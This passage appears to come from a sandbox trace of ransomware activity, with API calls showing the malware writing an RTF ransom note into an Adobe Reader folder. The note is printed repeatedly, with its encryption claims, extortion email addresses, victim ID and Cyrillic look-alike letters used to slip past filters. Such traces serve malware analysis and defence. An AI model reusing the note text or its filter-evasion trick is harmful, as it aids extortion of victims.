.\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0064.560] WriteFile (in: hFile=0x1fc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0064.561] CloseHandle (hObject=0x1fc) returned 1 [0064.561] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ptb\\bg85_info.rtf")) returned 0xffffffff [0064.561] GetLastError () returned 0x2 [0064.561] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\IDTemplates\\PTB\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\idtemplates\\ptb\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0064.562] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.562] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 